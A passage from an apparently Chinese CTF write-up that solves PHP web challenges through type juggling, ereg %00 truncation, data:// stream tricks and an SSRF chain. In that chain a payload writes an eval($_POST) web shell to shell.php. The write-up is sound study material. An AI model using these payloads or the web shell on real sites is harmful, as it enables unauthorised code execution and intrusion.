说明：<br>&#x2F;include.php?file&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,<br>或者 data:&#x2F;&#x2F;text&#x2F;plain;base64,PD9waHAgcGhwaW5mbygpPw4&#x3D;<br>或者 data:text&#x2F;plain,<br>或者 data:text&#x2F;plain;base64,PD9waHAgcGhwaW5mbygpPw4&#x3D;</p>
</blockquote>
<p><a name="Fifteen"></a></p>
<h1><span id="fifteen">Fifteen</span></h1><p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679542127027-714be85f-4389-4dd9-93a6-e84154e5c878.png#averageHue=%23fefdfd&clientId=u85ae9f2f-a94c-4&from=paste&height=418&id=u52474b77&name=image.png&originHeight=418&originWidth=691&originalType=binary&ratio=1&rotation=0&showTitle=false&size=8170&status=done&style=none&taskId=u9eb75359-b0e6-4d9f-9add-6e11606591e&title=&width=691#averageHue=%23fefdfd&id=XWs1N&originHeight=418&originWidth=691&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>) &amp;&amp; !<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$_GET</span>))&#123;<br>    <span class="hljs-variable">$url</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file&#x27;</span>];<br>    <span class="hljs-variable">$path</span> = <span class="hljs-string">&#x27;upload/&#x27;</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;path&#x27;</span>];<br></code></pre></td></tr></table></figure>

<p>传入两个参数 <br>file&#x3D; <br>path&#x3D;  <br>path会拼接上传的路径  <img src="https://www.yuque.com/api/services/graph/generate_redirect/latex?path%20=%20%27upload/%27.#card=math&code=path%20%3D%20%27upload%2F%27.&id=YI2XF">_GET[‘path’];</p>
<p>主要代码是这里</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-variable">$url</span>,<span class="hljs-string">&#x27;http://127.0.0.1/&#x27;</span>) === <span class="hljs-number">0</span>)&#123;<br>    <span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$path</span>, <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-variable">$url</span>));<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;console.log(<span class="hljs-subst">$path</span> update successed!)&quot;</span>;<br></code></pre></td></tr></table></figure>

<p>函数解析 ：</p>
<blockquote>
<p>strpos() f函数查找字符串在另一字符串中第一次出现的位置（区分大小写）。<br><strong>注释：</strong>strpos() 函数是区分大小写的。<br><strong>注释：</strong>该函数是二进制安全的。<br>相关函数：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-string-strrpos.html">strrpos()</a> - 查找字符串在另一字符串中最后一次出现的位置（区分大小写）</li>
<li><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-string-stripos.html">stripos()</a>- 查找字符串在另一字符串中第一次出现的位置（不区分大小写）</li>
<li><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-string-strripos.html">strripos()</a> -查找字符串在另一字符串中最后一次出现的位置（不区分大小写）</li>
</ul>
</blockquote>
<p>语法</p>
<blockquote>
<p>strpos(<em>string,find,start</em>)</p>
</blockquote>
<hr>
<p>所以file开头要等于 <a target="_blank" rel="noopener" href="http://127.0.0.1/">http://127.0.0.1/</a></p>
<blockquote>
<p>file_put_contents() 函数把一个字符串写入文件中。<br>该函数访问文件时，遵循以下规则：</p>
<ol>
<li>如果设置了 FILE_USE_INCLUDE_PATH，那么将检查 <em>filename</em> 副本的内置路径</li>
<li>如果文件不存在，将创建一个文件</li>
<li>打开文件</li>
<li>如果设置了 LOCK_EX，那么将锁定文件</li>
<li>如果设置了 FILE_APPEND，那么将移至文件末尾。否则，将会清除文件的内容</li>
<li>向文件中写入数据</li>
<li>关闭文件并对所有文件解锁</li>
</ol>
</blockquote>
<p>如果成功，该函数将返回写入文件中的字符数。如果失败，则返回 False。</p>
<blockquote>
<p>file_get_contents() 把整个文件读入一个字符串中。<br>该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持，还会使用内存映射技术来增强性能。</p>
</blockquote>
<p>所以</p>
<blockquote>
<p>file_put_contents(<img src="https://www.yuque.com/api/services/graph/generate_redirect/latex?path,%20file_get_contents(#card=math&code=path%2C%20file_get_contents%28&id=yqmRT)url">);</p>
</blockquote>
<p>这个代码的意思是，从<img src="https://www.yuque.com/api/services/graph/generate_redirect/latex?url%E8%8E%B7%E5%8F%96%E5%86%85%E5%AE%B9%E7%84%B6%E5%90%8E%E5%86%99%E5%85%A5#card=math&code=url%E8%8E%B7%E5%8F%96%E5%86%85%E5%AE%B9%E7%84%B6%E5%90%8E%E5%86%99%E5%85%A5&id=q8dsz">path中</p>
<p>先输入一个file <br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679542518303-030beaa3-55ee-4ba6-a772-fc9e90a9361d.png#averageHue=%23d3d3d3&clientId=u85ae9f2f-a94c-4&from=paste&height=923&id=ue419aa2b&name=image.png&originHeight=923&originWidth=1019&originalType=binary&ratio=1&rotation=0&showTitle=false&size=34651&status=done&style=none&taskId=u5eda277f-80c3-428c-88c4-9788e77ecc9&title=&width=1019#averageHue=%23d3d3d3&id=QLhG1&originHeight=923&originWidth=1019&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>出现logsole.log 但是没有路径<br>再输入第二个参数 path<br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679542562422-a5a186b6-eecd-46b3-aa31-67ae4b8a7ea1.png#averageHue=%23dadada&clientId=u85ae9f2f-a94c-4&from=paste&height=899&id=u67415b58&name=image.png&originHeight=899&originWidth=1018&originalType=binary&ratio=1&rotation=0&showTitle=false&size=32412&status=done&style=none&taskId=u72146eaa-bec2-4848-9b28-40020454652&title=&width=1018#averageHue=%23dadada&id=z5VLW&originHeight=899&originWidth=1018&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>他就会吧file 写入到1.php</p>
<p>利用ssrf的原理<br>构造payload <br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679543702666-c9f02220-f27f-4daa-8ebf-f710e2442be0.png#averageHue=%231d1d1c&clientId=u85ae9f2f-a94c-4&from=paste&height=235&id=ub9637496&name=image.png&originHeight=235&originWidth=1371&originalType=binary&ratio=1&rotation=0&showTitle=false&size=27554&status=done&style=none&taskId=u1bbe4264-2242-4aae-aa03-589176b5c7c&title=&width=1371#averageHue=%231d1d1c&id=rPF8a&originHeight=235&originWidth=1371&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679543769236-3421fc89-cd8a-4628-8d01-fdc78d913945.png#averageHue=%23d9d9d9&clientId=u85ae9f2f-a94c-4&from=paste&height=908&id=u523db4b0&name=image.png&originHeight=908&originWidth=1419&originalType=binary&ratio=1&rotation=0&showTitle=false&size=37953&status=done&style=none&taskId=u261dde8a-ffe5-40dd-87ca-b5435838053&title=&width=1419#averageHue=%23d9d9d9&id=VULOg&originHeight=908&originWidth=1419&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>但是这里还要经过二次url编码<br>是path的内容进行二次编码</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://localhost:23125/?file=http://127.0.0.1/index.php?file=http://127.0.0.1/&path=%253C%253Fphp%2520eval(%2524_POST%255Bcmd%255D)%253B%2520%253F%253E&path=shell.php">http://localhost:23125/?file=http://127.0.0.1/index.php?file=http://127.0.0.1/%26path=%3C%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%20%3F%3E&amp;path&#x3D;shell.php</a></p>
</blockquote>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679544606228-92e82340-167c-4d9b-9595-9389ef34900d.png#averageHue=%23d3d3d3&clientId=u85ae9f2f-a94c-4&from=paste&height=939&id=ua3af3199&name=image.png&originHeight=939&originWidth=1340&originalType=binary&ratio=1&rotation=0&showTitle=false&size=46254&status=done&style=none&taskId=u4e4e4294-86b0-4bce-9839-7df8343271f&title=&width=1340#averageHue=%23d3d3d3&id=u4RkN&originHeight=939&originWidth=1340&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679544597058-d9ef0a89-24c4-40fe-ba4d-143872f8ec7d.png#averageHue=%23e3e2e2&clientId=u85ae9f2f-a94c-4&from=paste&height=704&id=u219bf3be&name=image.png&originHeight=704&originWidth=1067&originalType=binary&ratio=1&rotation=0&showTitle=false&size=65730&status=done&style=none&taskId=ue8fb732d-dd11-4321-8cb1-ea2c3e08810&title=&width=1067#averageHue=%23e3e2e2&id=dO5iR&originHeight=704&originWidth=1067&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679544741250-2640758e-f348-4ee5-8b56-c04ff90397e2.png#averageHue=%23f7f7f7&clientId=u85ae9f2f-a94c-4&from=paste&height=431&id=u0db6109a&name=image.png&originHeight=431&originWidth=587&originalType=binary&ratio=1&rotation=0&showTitle=false&size=13303&status=done&style=none&taskId=u5a5c1b65-b54f-471b-ba81-102710f90b6&title=&width=587#averageHue=%23f7f7f7&id=pTaYe&originHeight=431&originWidth=587&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<p><a name="Sixteen"></a></p>
<h1><span id="sixteen">Sixteen</span></h1><p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679554680063-0718bf38-a847-4e17-acde-c3aeab2ab74b.png#averageHue=%23fefdfd&clientId=uf8576067-1eb0-4&from=paste&height=565&id=u840aacc0&name=image.png&originHeight=565&originWidth=802&originalType=binary&ratio=1&rotation=0&showTitle=false&size=13145&status=done&style=none&taskId=u9ff2ffcb-e77e-494f-af63-b0140bf09bf&title=&width=802#averageHue=%23fefdfd&id=Rk5ZM&originHeight=565&originWidth=802&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">ereg</span>(<span class="hljs-string">&quot;^[a-zA-Z0-9]+$&quot;</span>, <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;hihi&#x27;</span>]) === <span class="hljs-literal">FALSE</span>)<br></code></pre></td></tr></table></figure>

<p>只能有数字和字母，但是这里ereg函数存在 %00 截断漏洞</p>
<blockquote>
<p>ereg()用途<br>ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false。搜索字母的字符是大小写敏感的。<br>可选的输入参数规则包含一个数组的所有匹配表达式,他们被正则表达式的括号分组。</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">elseif</span> (<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;hihi&#x27;</span>]) &lt; <span class="hljs-number">11</span> &amp;&amp; <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;hihi&#x27;</span>] &gt; <span class="hljs-number">999999999</span>)<br></code></pre></td></tr></table></figure>

<p>这里传入的值要大于999999999，但是长度要小于11 <br>采用科学计数法  <strong>1e9</strong><br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679554916892-d0bcb4a0-68d8-408a-b8df-f65a75f680fd.png#averageHue=%23121212&clientId=uf8576067-1eb0-4&from=paste&height=236&id=uced97407&name=image.png&originHeight=236&originWidth=555&originalType=binary&ratio=1&rotation=0&showTitle=false&size=13197&status=done&style=none&taskId=u7b3ff8a7-5eee-4ff9-95f7-fcc0b1a753f&title=&width=555#averageHue=%23121212&id=sR2uq&originHeight=236&originWidth=555&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;hihi&#x27;</span>], <span class="hljs-string">&#x27;#HONG#&#x27;</span>) !== <span class="hljs-literal">FALSE</span>)<br></code></pre></td></tr></table></figure>

<p>hihi前面要有#HONG#   <br>然后前面又要判断只能是数字字母<br>所以1e9在前 然后使用%00截断 在 把#HONG# 放在%00后面<br>ereg可被%00截断，ereg识别1e9%00#HONG#到%00就认为字符串已结束，前面的1e9符合正则<br>payload ：</p>
<blockquote>
<p>submit&#x3D;1&amp;hihi&#x3D;1e9%00#HONG#</p>
</blockquote>
<p><a name="Seventeen"></a></p>
<h1><span id="seventeen">Seventeen</span></h1><p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679557384721-f125dd03-b42d-4a10-aa3f-0a5695fa6642.png#averageHue=%23fefcfc&clientId=u4d5a98b4-db55-4&from=paste&height=358&id=u053ea476&name=image.png&originHeight=358&originWidth=649&originalType=binary&ratio=1&rotation=0&showTitle=false&size=13122&status=done&style=none&taskId=u1dc5a885-ab91-4f9c-a361-8c224d5a0db&title=&width=649" alt="image.png"><br>又见ereg ,但是这里不是使用截断了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (!<span class="hljs-keyword">isset</span> (<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>])) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">ereg</span> (<span class="hljs-string">&#x27;\.&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>])) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">ereg</span> (<span class="hljs-string">&#x27;%&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>])) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">ereg</span> (<span class="hljs-string">&#x27;[0-9]&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>])) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">ereg</span> (<span class="hljs-string">&#x27;http&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>]) ) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">ereg</span> (<span class="hljs-string">&#x27;https&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>]) ) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">ereg</span> (<span class="hljs-string">&#x27;ftp&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>])) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">ereg</span> (<span class="hljs-string">&#x27;telnet&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>])) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">ereg</span> (<span class="hljs-string">&#x27;_&#x27;</span>, <span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;QUERY_STRING&#x27;</span>])) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$smile</span>) &#123; <br>        <span class="hljs-keyword">if</span> (@<span class="hljs-title function_ invoke__">file_exists</span> (<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>])) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    &#125;  <br></code></pre></td></tr></table></figure>
<p>GET&#x3D; ^_^<br>^_^	不能有,0-9,%,http……等等 ，不然 $smile &#x3D; 0</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">ereg</span> (<span class="hljs-string">&#x27;_&#x27;</span>, <span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;QUERY_STRING&#x27;</span>])) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;<br></code></pre></td></tr></table></figure>
<p> $_SERVER[“QUERY_STRING”]    #查询（query）的字符串   <br>提取自己得的 query字符串 <br>矛盾点：<br>$_GET数组本身提取自QUERY_STRING，$_GET[‘^_^’]中key包含_符号，而QUERY_STRING 却不允许。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-variable">$smile</span>) &#123; <br>        <span class="hljs-keyword">if</span> (@<span class="hljs-title function_ invoke__">file_exists</span> (<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>])) <span class="hljs-variable">$smile</span> = <span class="hljs-number">0</span>;  <br>    &#125; <br></code></pre></td></tr></table></figure>
<p>file_exists需要寻找的文件必须不存在、</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-number">1</span>) &#123;<br>    <span class="hljs-variable">$smile</span> = @<span class="hljs-title function_ invoke__">file_get_contents</span> (<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;^_^&#x27;</span>]);<br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$smile</span> === <span class="hljs-string">&quot;(●&#x27;◡&#x27;●)&quot;</span>) <span class="hljs-keyword">die</span>(<span class="hljs-variable">$flag</span>);<br>&#125;<br></code></pre></td></tr></table></figure>
<p>写入的内容要强等于  (●’◡’●)<br>绕过</p>
<blockquote>
<p>当.或[]之类的符号作为参数的key的时候，会被PHP改写为   _<br>绕过   if (ereg (‘_’, $_SERVER[‘QUERY_STRING’])) $smile &#x3D; 0;  </p>
</blockquote>
<p>file_get_contents可以获取远程数据，但常用网络协议已经被正则过滤，因此需要选取其他协议。</p>
<blockquote>
<p>data协议可用，file_exists对于data指向内容判断为不存在</p>
</blockquote>
<p><strong>payload ：</strong></p>
<blockquote>
<p>?^.^&#x3D;data:&#x2F;&#x2F;text&#x2F;plain;charset&#x3D;unicode,(●’◡’●)</p>
</blockquote>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679558364386-3d632b45-3980-4047-adfa-fcbe668100d2.png#averageHue=%23d4d4d4&clientId=u4d5a98b4-db55-4&from=paste&height=837&id=u39edfe5e&name=image.png&originHeight=837&originWidth=1012&originalType=binary&ratio=1&rotation=0&showTitle=false&size=35321&status=done&style=none&taskId=ua46521fa-d126-417f-a691-e51629b635b&title=&width=1012" alt="image.png"></p>
<p><a name="WqiJp"></a></p>
<h3><span id="_server的数组信息表">$_SERVER的数组信息表</span></h3><p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679571984698-f57b30d5-e328-4587-8169-9e4731c6d622.png#averageHue=%23f0f0f0&clientId=uc8f7f8c6-8849-4&from=paste&height=1041&id=ua5eed2f9&name=image.png&originHeight=1041&originWidth=1044&originalType=binary&ratio=1&rotation=0&showTitle=false&size=222991&status=done&style=none&taskId=u355402ae-d078-452c-8684-ca7b941de3c&title=&width=1044" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679571988467-563cda8f-e438-42cf-b52d-41909d61fb54.png#averageHue=%23f5f5f5&clientId=uc8f7f8c6-8849-4&from=paste&height=805&id=ua5b269f8&name=image.png&originHeight=805&originWidth=1166&originalType=binary&ratio=1&rotation=0&showTitle=false&size=133820&status=done&style=none&taskId=u4b1fe5f3-2e66-4a30-8732-b77c8167e2f&title=&width=1166" alt="image.png"></p>
<p><a name="Eighteen"></a></p>
<h1><span id="eighteen">Eighteen</span></h1><p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679558615943-64062c91-368a-4473-b21d-6b4466d47b7e.png#averageHue=%23dadada&clientId=u6c2c4917-9d96-4&from=paste&height=794&id=u05bd652c&name=image.png&originHeight=794&originWidth=755&originalType=binary&ratio=1&rotation=0&showTitle=false&size=25953&status=done&style=none&taskId=u1d7310a6-f79b-411e-841e-cb32101bfde&title=&width=755#averageHue=%23dadada&id=tXRO0&originHeight=794&originWidth=755&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>源代码 ： <br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679558802495-a4b3502e-eeab-4ca3-8c9b-ba938bf0ad73.png#averageHue=%231f1e1e&clientId=u6c2c4917-9d96-4&from=paste&height=739&id=u64e1041f&name=image.png&originHeight=739&originWidth=1116&originalType=binary&ratio=1&rotation=0&showTitle=false&size=50534&status=done&style=none&taskId=u14f6fcda-e783-4ce9-bf2f-d1ee2a777ee&title=&width=1116#averageHue=%231f1e1e&id=tUITq&originHeight=739&originWidth=1116&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>传入参数 ：</p>
<blockquote>
<p>id<br>login<br>name<br>password<br>user</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(@<span class="hljs-title function_ invoke__">strcmp</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;user&#x27;</span>],<span class="hljs-variable">$USER</span>))<br>&#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;user错误！&#x27;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>传入的user 与 常量$USER进行比较<br>比较函数strcmp，当strcmp第一个参数小于第二个参数时，返回值为负一，反之为正一，相等时为零。<br>在不知道常量USER的情况下，满足条件，可以破坏数据结构，参数字符串改成数据，即可得到false值</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;name&#x27;</span>]) &amp;&amp; <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;password&#x27;</span>]))<br>&#123;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;name&#x27;</span>] == <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;password&#x27;</span>] )<br>    &#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;账号密码不能一致！&#x27;</span>);<br>    &#125;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;name&#x27;</span>]) === <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;password&#x27;</span>]))<br></code></pre></td></tr></table></figure>

<p>账号密码不能一致，然后要求 md5 相等 ，可以使用数组绕过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_numeric</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;id&#x27;</span>])&amp;&amp;<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;id&#x27;</span>]!==<span class="hljs-string">&#x27;72&#x27;</span> &amp;&amp; !<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/\s/&#x27;</span>, <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;</span><br><span class="hljs-string">&#123;</span><br><span class="hljs-string">        if($_POST[&#x27;</span>id<span class="hljs-string">&#x27;]==72)</span><br><span class="hljs-string">            die(&quot;flag&#123;poipodajhdkayy&#125;&quot;);</span><br><span class="hljs-string">        else</span><br><span class="hljs-string">            die(&quot;ID错误2！&quot;);</span><br><span class="hljs-string">&#125;</span><br></code></pre></td></tr></table></figure>

<p>传入id 需要是数字，if中全类型比较，不是72，可以使用小数类型绕过，然后不含空格，输入flag</p>
<blockquote>
<p>Payload:<br>id&#x3D;72.0&amp;login&#x3D;Check&amp;name[]&#x3D;a&amp;password[]&#x3D;b&amp;user[]&#x3D;2</p>
</blockquote>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679559287216-0d89f0bf-09de-4e6a-b9cc-fbefcc7b397b.png#averageHue=%23838383&clientId=u6c2c4917-9d96-4&from=paste&height=775&id=u85782a3f&name=image.png&originHeight=775&originWidth=1283&originalType=binary&ratio=1&rotation=0&showTitle=false&size=62797&status=done&style=none&taskId=ud6b06de1-accc-4604-af86-f82caa1f6e7&title=&width=1283#averageHue=%23838383&id=p60mJ&originHeight=775&originWidth=1283&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<p><a name="Nineteen"></a></p>
<h1><span id="nineteen">Nineteen</span></h1><p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679560480183-232aaf78-a167-455e-bb94-5bfe895157d8.png#averageHue=%23bab9b9&clientId=ua610c54a-9b5c-4&from=paste&height=523&id=u78b6f31c&name=image.png&originHeight=523&originWidth=1249&originalType=binary&ratio=1&rotation=0&showTitle=false&size=33539&status=done&style=none&taskId=u57c7efa8-325d-4d90-9a61-98971883492&title=&width=1249#averageHue=%23bab9b9&id=Conml&originHeight=523&originWidth=1249&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<p>条件：</p>
<blockquote>
<ol>
<li>$sss !&#x3D;&#x3D; ‘0x666’</li>
<li>$sss &#x3D;&#x3D; ‘0x666’ 可知 $sss 的值需要等于数值 0x666，而又不能等于字符串 ‘0x666’，其中涉及PHP的弱类型比较</li>
<li>if(!preg_match(“&#x2F;[^0-6]&#x2F;“,$sss)) $sss只能包含 0–6 的数字</li>
<li>if(strlen($sss)&#x3D;&#x3D;666) $sss 的长度等于 666、</li>
</ol>
</blockquote>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679560639756-14047fd7-8de1-4db2-b3af-0d8e9f25b9e6.png#averageHue=%232d2d2d&clientId=ua610c54a-9b5c-4&from=paste&height=166&id=ub675aa6d&name=image.png&originHeight=166&originWidth=996&originalType=binary&ratio=1&rotation=0&showTitle=false&size=7696&status=done&style=none&taskId=u0808aca5-768c-47f4-b5cc-aa74a11b75a&title=&width=996#averageHue=%232d2d2d&id=TpHTN&originHeight=166&originWidth=996&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>使用脚本跑<br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679560916486-abf4d2c0-33e8-413e-a5d7-d109980b9930.png#averageHue=%231f1f1e&clientId=ua610c54a-9b5c-4&from=paste&height=709&id=ue4d3f549&name=image.png&originHeight=709&originWidth=1365&originalType=binary&ratio=1&rotation=0&showTitle=false&size=46875&status=done&style=none&taskId=u781caefd-8273-4d4e-9669-f28ec1653d6&title=&width=1365#averageHue=%231f1f1e&id=LIQtA&originHeight=709&originWidth=1365&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<p><a name="Twenty"></a></p>
